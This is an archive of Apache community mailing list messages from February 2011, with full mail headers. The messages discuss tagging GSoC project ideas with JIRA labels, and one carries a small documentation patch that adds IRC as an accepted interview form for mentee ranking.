4:23 PM, Ross Gardler wrote: > http://goo.gl/7EaUC What is the preferred method for projects to record project ideas this year? Thanks Kathey From [email protected] Tue Feb 08 21:16:41 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20291 invoked from network); 8 Feb 2011 21:16:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Feb 2011 21:16:41 -0000 Received: (qmail 96728 invoked by uid 500); 8 Feb 2011 21:16:41 -0000 Delivered-To: [email protected] Received: (qmail 96574 invoked by uid 500); 8 Feb 2011 21:16:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 96566 invoked by uid 99); 8 Feb 2011 21:16:40 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 08 Feb 2011 21:16:40 +0000 X-ASF-Spam-Status: No, hits=-1.6 required=5.0 tests=RCVD_IN_DNSWL_MED,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO e33.co.us.ibm.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 08 Feb 2011 21:16:32 +0000 Received: from d03relay02.boulder.ibm.com (d03relay02.boulder.ibm.com [161.129.204.104]) by e33.co.us.ibm.com (8.14.4/8.13.1) with ESMTP id p18L9n4O027019 for <[email protected]>; Tue, 8 Feb 2011 14:09:49 -0700 Received: from d03av04.boulder.ibm.com (d03av04.boulder.ibm.com [161.129.204.104]) by d03relay02.boulder.ibm.com (8.13.8/8.13.8/NCO v9.1) with ESMTP id p18LG5Rs182500 for <[email protected]>; Tue, 8 Feb 2011 14:16:05 -0700 Received: from d03av04.boulder.ibm.com (loopback [161.129.204.104]) by d03av04.boulder.ibm.com (8.14.4/8.13.1/NCO v10.0 AVout) with ESMTP id p18LDfpo003499 for <[email protected]>; Tue, 8 Feb 2011 14:13:41 -0700 Received: from [161.129.204.104] (sig-9-65-13-128.mts.ibm.com [161.129.204.104]) by d03av04.boulder.ibm.com (8.14.4/8.13.1/NCO v10.0 AVin) with ESMTP id p18LDbCq003200 for <[email protected]>; Tue, 8 Feb 2011 14:13:41 -0700 Message-ID: <[email protected]> Date: Tue, 08 Feb 2011 13:16:02 -0800 From: Kathey Marsden <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:161.129.204.104) Gecko/20101207 Thunderbird/3.1.7 MIME-Version: 1.0 To: [email protected] Subject: Re: GSoC is go... References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit On 2/4/2011 8:35 AM, Kathey Marsden wrote: > On 1/24/2011 4:23 PM, Ross Gardler wrote: >> http://goo.gl/7EaUC > What is the preferred method for projects to record project ideas this > year? > I missed it the first time but realize this is covered at: http://community.apache.org/gsoc.html which still has 2010 information but I assume this part stays the same. All ASF projects are invited to submit their ideas to their issue tracker, please be sure to add the labels "gsoc" and "mentor" so that we can automatically include them in our list of subjects. If your project does not use JIRA please contact [email protected]. For Derby for last year we also had the label gsoc2010 which I think is a good addition so we will add labels "gsoc", "mentor", and "gsoc2011" for this year. Speak up if this is not ok. Thanks Kathey From [email protected] Tue Feb 08 22:09:50 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 44329 invoked from network); 8 Feb 2011 22:09:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Feb 2011 22:09:49 -0000 Received: (qmail 99239 invoked by uid 500); 8 Feb 2011 22:09:49 -0000 Delivered-To: [email protected] Received: (qmail 99081 invoked by uid 500); 8 Feb 2011 22:09:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 99073 invoked by uid 99); 8 Feb 2011 22:09:48 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 08 Feb 2011 22:09:48 +0000 X-ASF-Spam-Status: No, hits=0.7 required=5.0 tests=SPF_HELO_PASS,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO uli.spielviel.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 08 Feb 2011 22:09:40 +0000 Received: from [161.129.204.104] (i59F7FB30.versanet.de [161.129.204.104]) by uli.spielviel.de (Postfix) with ESMTPSA id 0BA80BF401 for <[email protected]>; Tue, 8 Feb 2011 23:09:20 +0100 (CET) Message-ID: <[email protected]> Date: Tue, 08 Feb 2011 23:09:19 +0100 From: =?ISO-8859-1?Q?Ulrich_St=E4rk?= <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:161.129.204.104) Gecko/20101207 Thunderbird/3.1.7 MIME-Version: 1.0 To: [email protected] Subject: Re: GSoC is go... References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org The labels plugin was disabled in the old JIRA because it caused problems. It seems that it is enabled now with the new JIRA version but I don't know it's status or whether it will stay enabled. Uli On 08.02.2011 22:16, Kathey Marsden wrote: > On 2/4/2011 8:35 AM, Kathey Marsden wrote: >> On 1/24/2011 4:23 PM, Ross Gardler wrote: >>> http://goo.gl/7EaUC >> What is the preferred method for projects to record project ideas this year? >> > > I missed it the first time but realize this is covered at: http://community.apache.org/gsoc.html > which still has 2010 information but I assume this part stays the same. > > All ASF projects are invited to submit their ideas to their issue tracker, please be sure to add the > labels "gsoc" and "mentor" so that we can automatically include them in our list of subjects. If > your project does not use JIRA please contact [email protected]. > > For Derby for last year we also had the label gsoc2010 which I think is a good addition so we will > add labels > "gsoc", "mentor", and "gsoc2011" for this year. > > Speak up if this is not ok. > > Thanks > > Kathey > From [email protected] Tue Feb 08 22:31:58 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50050 invoked from network); 8 Feb 2011 22:31:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Feb 2011 22:31:58 -0000 Received: (qmail 49345 invoked by uid 500); 8 Feb 2011 22:31:58 -0000 Delivered-To: [email protected] Received: (qmail 49184 invoked by uid 500); 8 Feb 2011 22:31:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 45555 invoked by uid 99); 8 Feb 2011 22:27:19 -0000 X-ASF-Spam-Status: No, hits=-0.0 required=5.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Message-ID: <[email protected]> Date: Tue, 08 Feb 2011 23:26:50 +0100 From: =?ISO-8859-1?Q?Ulrich_St=E4rk?= <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:161.129.204.104) Gecko/20101207 Thunderbird/3.1.7 MIME-Version: 1.0 To: [email protected] Subject: Re: GSoC is go... References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org Labels are now integrated into JIRA directly we don't need to worry about the plugin breaking. So just telling projects to label their issues should be ok. Uli On 08.02.2011 23:09, Ulrich Stärk wrote: > The labels plugin was disabled in the old JIRA because it caused problems. It seems that it is > enabled now with the new JIRA version but I don't know it's status or whether it will stay enabled. > > Uli > > On 08.02.2011 22:16, Kathey Marsden wrote: >> On 2/4/2011 8:35 AM, Kathey Marsden wrote: >>> On 1/24/2011 4:23 PM, Ross Gardler wrote: >>>> http://goo.gl/7EaUC >>> What is the preferred method for projects to record project ideas this year? >>> >> >> I missed it the first time but realize this is covered at: http://community.apache.org/gsoc.html >> which still has 2010 information but I assume this part stays the same. >> >> All ASF projects are invited to submit their ideas to their issue tracker, please be sure to add the >> labels "gsoc" and "mentor" so that we can automatically include them in our list of subjects. If >> your project does not use JIRA please contact [email protected]. >> >> For Derby for last year we also had the label gsoc2010 which I think is a good addition so we will >> add labels >> "gsoc", "mentor", and "gsoc2011" for this year. >> >> Speak up if this is not ok. >> >> Thanks >> >> Kathey >> From [email protected] Tue Feb 08 22:34:01 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51450 invoked from network); 8 Feb 2011 22:34:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Feb 2011 22:34:01 -0000 Received: (qmail 55078 invoked by uid 500); 8 Feb 2011 22:34:00 -0000 Delivered-To: [email protected] Received: (qmail 54919 invoked by uid 500); 8 Feb 2011 22:34:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 54904 invoked by uid 99); 8 Feb 2011 22:34:00 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 08 Feb 2011 22:34:00 +0000 X-ASF-Spam-Status: No, hits=-1.6 required=5.0 tests=RCVD_IN_DNSWL_MED,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO e37.co.us.ibm.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 08 Feb 2011 22:33:49 +0000 Received: from d03relay02.boulder.ibm.com (d03relay02.boulder.ibm.com [161.129.204.104]) by e37.co.us.ibm.com (8.14.4/8.13.1) with ESMTP id p18MUnpP017201 for <[email protected]>; Tue, 8 Feb 2011 15:30:49 -0700 Received: from d03av03.boulder.ibm.com (d03av03.boulder.ibm.com [161.129.204.104]) by d03relay02.boulder.ibm.com (8.13.8/8.13.8/NCO v9.1) with ESMTP id p18MXK9N250918 for <[email protected]>; Tue, 8 Feb 2011 15:33:20 -0700 Received: from d03av03.boulder.ibm.com (loopback [161.129.204.104]) by d03av03.boulder.ibm.com (8.14.4/8.13.1/NCO v10.0 AVout) with ESMTP id p18MXKoe019503 for <[email protected]>; Tue, 8 Feb 2011 15:33:20 -0700 Received: from [161.129.204.104] (sig-9-65-13-128.mts.ibm.com [161.129.204.104]) by d03av03.boulder.ibm.com (8.14.4/8.13.1/NCO v10.0 AVin) with ESMTP id p18MXITe019423 for <[email protected]>; Tue, 8 Feb 2011 15:33:20 -0700 Message-ID: <[email protected]> Date: Tue, 08 Feb 2011 14:33:20 -0800 From: Kathey Marsden <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:161.129.204.104) Gecko/20101207 Thunderbird/3.1.7 MIME-Version: 1.0 To: [email protected] Subject: Re: GSoC is go... References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org On 2/8/2011 2:09 PM, Ulrich Stärk wrote: > The labels plugin was disabled in the old JIRA because it caused problems. It seems that it is > enabled now with the new JIRA version but I don't know it's status or whether it will stay enabled. > > Uli Thank you Uli. Since students are showing up and it seems like it time to start collecting ideas and recruiting mentors, I think we'll just start with logging issues in the Derby Jira with the labels and then can adjust to the ultimately determined procedure once it is ultimately determined . Whatever it ends up to be, hopefully it can just have links to the Jira issues. If not, I am sure converting to the new thing will be easy enough. I never tracked what the problem was with the labels, but wonder (pure speculation) if its loss without a replacement tracking system was not at least partially responsible for Apache not being accepted as a mentoring organization for Google Code-In. I think it would be good to have some sort of project ideas list ready when we submit our application for GSoC. Kathey From [email protected] Tue Feb 08 22:35:49 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52326 invoked from network); 8 Feb 2011 22:35:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Feb 2011 22:35:48 -0000 Received: (qmail 57656 invoked by uid 500); 8 Feb 2011 22:35:48 -0000 Delivered-To: [email protected] Received: (qmail 57493 invoked by uid 500); 8 Feb 2011 22:35:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57485 invoked by uid 99); 8 Feb 2011 22:35:47 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 08 Feb 2011 22:35:47 +0000 X-ASF-Spam-Status: No, hits=-1.6 required=5.0 tests=RCVD_IN_DNSWL_MED,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO e33.co.us.ibm.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 08 Feb 2011 22:35:37 +0000 Received: from d03relay03.boulder.ibm.com (d03relay03.boulder.ibm.com [161.129.204.104]) by e33.co.us.ibm.com (8.14.4/8.13.1) with ESMTP id p18MSumg017177 for <[email protected]>; Tue, 8 Feb 2011 15:28:56 -0700 Received: from d03av03.boulder.ibm.com (d03av03.boulder.ibm.com [161.129.204.104]) by d03relay03.boulder.ibm.com (8.13.8/8.13.8/NCO v10.0) with ESMTP id p18MZB8D122016 for <[email protected]>; Tue, 8 Feb 2011 15:35:11 -0700 Received: from d03av03.boulder.ibm.com (loopback [161.129.204.104]) by d03av03.boulder.ibm.com (8.14.4/8.13.1/NCO v10.0 AVout) with ESMTP id p18MZBlL025748 for <[email protected]>; Tue, 8 Feb 2011 15:35:11 -0700 Received: from [161.129.204.104] (sig-9-65-13-128.mts.ibm.com [161.129.204.104]) by d03av03.boulder.ibm.com (8.14.4/8.13.1/NCO v10.0 AVin) with ESMTP id p18MZAnR025661 for <[email protected]>; Tue, 8 Feb 2011 15:35:11 -0700 Message-ID: <[email protected]> Date: Tue, 08 Feb 2011 14:35:11 -0800 From: Kathey Marsden <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:161.129.204.104) Gecko/20101207 Thunderbird/3.1.7 MIME-Version: 1.0 To: [email protected] Subject: Re: GSoC is go... References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org On 2/8/2011 2:09 PM, Ulrich Stärk wrote: > The labels plugin was disabled in the old JIRA because it caused problems. It seems that it is > enabled now with the new JIRA version but I don't know it's status or whether it will stay enabled. > > Uli Thanks Uli! Please ignore my rambling post a minute ago. I did not see yours before I hit send. From [email protected] Thu Feb 10 21:44:16 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5105 invoked from network); 10 Feb 2011 21:44:15 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Feb 2011 21:44:15 -0000 Received: (qmail 38312 invoked by uid 500); 10 Feb 2011 21:44:15 -0000 Delivered-To: [email protected] Received: (qmail 38182 invoked by uid 500); 10 Feb 2011 21:44:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38174 invoked by uid 99); 10 Feb 2011 21:44:14 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 10 Feb 2011 21:44:14 +0000 X-ASF-Spam-Status: No, hits=-1.6 required=5.0 tests=RCVD_IN_DNSWL_MED,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO e5.ny.us.ibm.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 10 Feb 2011 21:44:05 +0000 Received: from d01dlp02.pok.ibm.com (d01dlp02.pok.ibm.com [161.129.204.104]) by e5.ny.us.ibm.com (8.14.4/8.13.1) with ESMTP id p1ALJ77U027328 for <[email protected]>; Thu, 10 Feb 2011 16:19:38 -0500 Received: from d01relay02.pok.ibm.com (d01relay02.pok.ibm.com [161.129.204.104]) by d01dlp02.pok.ibm.com (Postfix) with ESMTP id 087A64DE8044 for <[email protected]>; Thu, 10 Feb 2011 16:42:51 -0500 (EST) Received: from d03av03.boulder.ibm.com (d03av03.boulder.ibm.com [161.129.204.104]) by d01relay02.pok.ibm.com (8.13.8/8.13.8/NCO v10.0) with ESMTP id p1ALhgCD451112 for <[email protected]>; Thu, 10 Feb 2011 16:43:42 -0500 Received: from d03av03.boulder.ibm.com (loopback [161.129.204.104]) by d03av03.boulder.ibm.com (8.14.4/8.13.1/NCO v10.0 AVout) with ESMTP id p1ALhfGs019942 for <[email protected]>; Thu, 10 Feb 2011 14:43:41 -0700 Received: from [161.129.204.104] (sig-9-48-125-202.mts.ibm.com [161.129.204.104]) by d03av03.boulder.ibm.com (8.14.4/8.13.1/NCO v10.0 AVin) with ESMTP id p1ALhdCU019848 for <[email protected]>; Thu, 10 Feb 2011 14:43:41 -0700 Message-ID: <[email protected]> Date: Thu, 10 Feb 2011 13:43:40 -0800 From: Kathey Marsden <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:161.129.204.104) Gecko/20101207 Thunderbird/3.1.7 MIME-Version: 1.0 To: [email protected] Subject: [PATCH] update mentee ranking to include IRC as valid form of full point interview Content-Type: multipart/mixed; boundary="------------060406090809030303070201" X-Content-Scanned: Fidelis XPS MAILER --------------060406090809030303070201 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Hello, Here is a patch to update the valid forms of full point interview for GSoC to inlclude IRC as discussed last year on the thread http://[email protected]%3E I also wanted to confirm that with the new CMS website format is just changing/submitting this mdtext file all I need to do? Thanks Kathey --------------060406090809030303070201 Content-Type: text/plain; name="mentee_ranking_IRC_diff.txt" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="mentee_ranking_IRC_diff.txt" SW5kZXg6IGNvbnRlbnQvbWVudGVlLXJhbmtpbmctcHJvY2Vzcy5tZHRleHQNCj09PT09PT09 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09 PT09PT0NCi0tLSBjb250ZW50L21lbnRlZS1yYW5raW5nLXByb2Nlc3MubWR0ZXh0CShyZXZp c2lvbiAxMDY5NTc1KQ0KKysrIGNvbnRlbnQvbWVudGVlLXJhbmtpbmctcHJvY2Vzcy5tZHRl eHQJKHdvcmtpbmcgY29weSkNCkBAIC01OCw3ICs1OCw3IEBADQogdGVjaG5pY2FsIHJlbGV2 YW5jZSwgY29tcGxldGVuZXNzLCBhd2FyZW5lc3Mgb2YgaXNzdWVzLCByZWFsaXN0aWMgcGxh bm5pbmcKIChsZXNzIGNvcHkgYW5kIHBhc3RlKT8gKDAtNCBwb2ludHMpCiAqIEhvdyBkb2Vz IHRoZSBtZW50b3IgcmF0ZSB0aGUgc3R1ZGVudCdzIGNoYW5jZXMgb2Ygc3VjY2VzcywgYmFz ZWQgb24gYW4KLWluLXBlcnNvbiAoZmFjZS10by1mYWNlLCB2aWRlbywgYXVkaW8sIGVtYWls KSBpbnRlcnZpZXc/ICgwLTMgcG9pbnRzLCBvcgoraW4tcGVyc29uIChmYWNlLXRvLWZhY2Us IHZpZGVvLCBhdWRpbywgSVJDLCAgZW1haWwpIGludGVydmlldz8gKDAtMyBwb2ludHMsIG9y CiAwLTEgaWYgZW1haWwgaW50ZXJ2aWV3IG9ubHkpCiAqIEhvdyBkbyB3ZSByYXRlIHRoZSBv cmlnaW5hbGl0eSBvZiB0aGUgc3R1ZGVudCdzIGNvbnRyaWJ1dGlvbnMgdG8gdGhlCiBwcm9w b3NhbD8gKDAtMiBwb2ludHMsIDAgaWYgbWVudG9yIHByb3ZpZGVzIHByb3Bvc2FsLCAxIGlm IHN0dWRlbnQgYnVpbGRzCg== --------------060406090809030303070201-- From [email protected] Fri Feb 11 08:18:20 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74077 invoked from network); 11 Feb 2011 08:18:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Feb 2011 08:18:20 -0000 Received: (qmail 82319 invoked by uid 500); 11 Feb 2011 08:18:20 -0000 Delivered-To: [email protected] Received: (qmail 82172 invoked by uid 500); 11 Feb 2011 08:18:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 82164 invoked by uid 99); 11 Feb 2011 08:18:15 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Feb 2011 08:18:15 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED,T_RP_MATCHES_RCVD X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 11 Feb 2011 08:18:13 +0000 Received: (qmail 73947 invoked by uid 99); 11 Feb 2011 08:17:51 -0000 Received: from localhost.apache.org (HELO mail-vx0-f170.google.com) (161.129.204.104) (smtp-auth username bdelacretaz, mechanism plain) by minotaur.apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Feb 2011 08:17:51 +0000 Received: by vxc38 with SMTP id 38so1179857vxc.29 for <[email protected]>; Fri, 11 Feb 2011 00:17:49 -0800 (PST) MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id v12mr296599vcn.166.1297412269807; Fri, 11 Feb 2011 00:17:49 -0800 (PST) Received: by 161.129.204.104 with HTTP; Fri, 11 Feb 2011 00:17:49 -0800 (PST) In-Reply-To: <[email protected]> References: <[email protected]> Date: Fri, 11 Feb 2011 09:17:49 +0100 Message-ID: <[email protected]> Subject: Re: [PATCH] update mentee ranking to include IRC as valid form of full point interview From: Bertrand Delacretaz <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Hi, On Thu, Feb 10, 2011 at 10:43 PM, Kathey Marsden <[email protected]> wrote: > Here is a patch to update the valid forms of full point interview for GSo= C > to inlclude IRC... Looks good to me. > ...I also wanted to confirm that with the new CMS website format is just > changing/submitting =C2=A0this mdtext file all I need to do?... After committing under https://svn.apache.org/repos/asf/comdev/site/trunk you need to go to https://cms.apache.org/community/ where you can check the staging version of the site, and if ok publish to the live site. See http://wiki.apache.org/general/ApacheCms2010 for more info, mostly the "CMS reference" links. -Bertrand From [email protected] Fri Feb 11 17:17:25 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41233 invoked from network); 11 Feb 2011 17:17:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Feb 2011 17:17:25 -0000 Received: (qmail 87463 invoked by uid 500); 11 Feb 2011 17:17:25 -0000 Delivered-To: [email protected] Received: (qmail 86684 invoked by uid 500); 11 Feb 2011 17:17:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86675 invoked by uid 99); 11 Feb 2011 17:17:22 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Feb 2011 17:17:22 +0000 X-ASF-Spam-Status: No, hits=-1.6 required=5.0 tests=RCVD_IN_DNSWL_MED,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO e4.ny.us.ibm.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 11 Feb 2011 17:17:12 +0000 Received: from d01dlp01.pok.ibm.com (d01dlp01.pok.ibm.com [161.129.204.104]) by e4.ny.us.ibm.com (8.14.4/8.13.1) with ESMTP id p1BGwBTl019551 for <[email protected]>; Fri, 11 Feb 2011 11:58:13 -0500 Received: from d01relay05.pok.ibm.com (d01relay05.pok.ibm.com [161.129.204.104]) by d01dlp01.pok.ibm.com (Postfix) with ESMTP id EA36C728116 for <[email protected]>; Fri, 11 Feb 2011 12:16:24 -0500 (EST) Received: from d01av03.pok.ibm.com (d01av03.pok.ibm.com [161.129.204.104]) by d01relay05.pok.ibm.com (8.13.8/8.13.8/NCO v10.0) with ESMTP id p1BHGOsV118134 for <[email protected]>; Fri, 11 Feb 2011 12:16:24 -0500 Received: from d01av03.pok.ibm.com (loopback [161.129.204.104]) by d01av03.pok.ibm.com (8.14.4/8.13.1/NCO v10.0 AVout) with ESMTP id p1BHGNxm010618 for <[email protected]>; Fri, 11 Feb 2011 15:16:23 -0200 Received: from [161.129.204.104] (sig-9-48-125-202.mts.ibm.com [161.129.204.104]) by d01av03.pok.ibm.com (8.14.4/8.13.1/NCO v10.0 AVin) with ESMTP id p1BHGEmM010265 for <[email protected]>; Fri, 11 Feb 2011 15:16:23 -0200 Message-ID: <[email protected]> Date: Fri, 11 Feb 2011 09:16:14 -0800 From: Kathey Marsden <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:161.129.204.104) Gecko/20101207 Thunderbird/3.1.7 MIME-Version: 1.0 To: [email protected] Subject: Re: [PATCH] update mentee ranking to include IRC as valid form of full point interview References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit X-Content-Scanned: Fidelis XPS MAILER X-Virus-Checked: Checked by ClamAV on apache.org On 2/11/2011 12:17 AM, Bertrand Delacretaz wrote: > After committing under > https://svn.apache.org/repos/asf/comdev/site/trunk you need to go to > https://cms.apache.org/community/ where you can check the staging > version of the site, and if ok publish to the live site. > > See http://wiki.apache.org/general/ApacheCms2010 for more info, mostly > the "CMS reference" links. > Thanks! Next time I will try CMS edit directly. Kathey From [email protected] Tue Feb 15 20:09:21 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75871 invoked from network); 15 Feb 2011 20:09:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Feb 2011 20:09:21 -0000 Received: (qmail 83610 invoked by uid 500); 15 Feb 2011 20:09:20 -0000 Delivered-To: [email protected] Received: (qmail 83444 invoked by uid 500); 15 Feb 2011 20:09:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <dev.community.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83422 invoked by uid 99); 15 Feb 2011 20:09:17 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 15 Feb 2011 20:09:17 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=5.0 tests=RCVD_IN_DNSWL_LOW,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO cpanelsmarthost1.zen.co.uk) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 15 Feb 2011 20:09:10 +0000 Received: from [161.129.204.104] (helo=zencphosting06.zen.co.uk) by cpanelsmarthost1.zen.co.uk with esmtp (Exim 4.69) (envelope-from <[email protected]>) id 1PpRCa-0001iw-OH for [email protected]; Tue, 15 Feb 2011 20:08:48 +0000 Received: from 5ad80d76.bb.sky.com ([161.129.204.104] helo=[161.129.204.104]) by zencphosting06.zen.co.uk with esmtpsa (TLSv1:AES256-SHA:256) (Exim 4.69) (envelope-from <[email protected]>) id 1PpRCa-0007Mn-IK; Tue, 15 Feb 2011 20:08:48 +0000 Message-ID: <[email protected]> Date: Tue, 15 Feb 2011 20:08:46 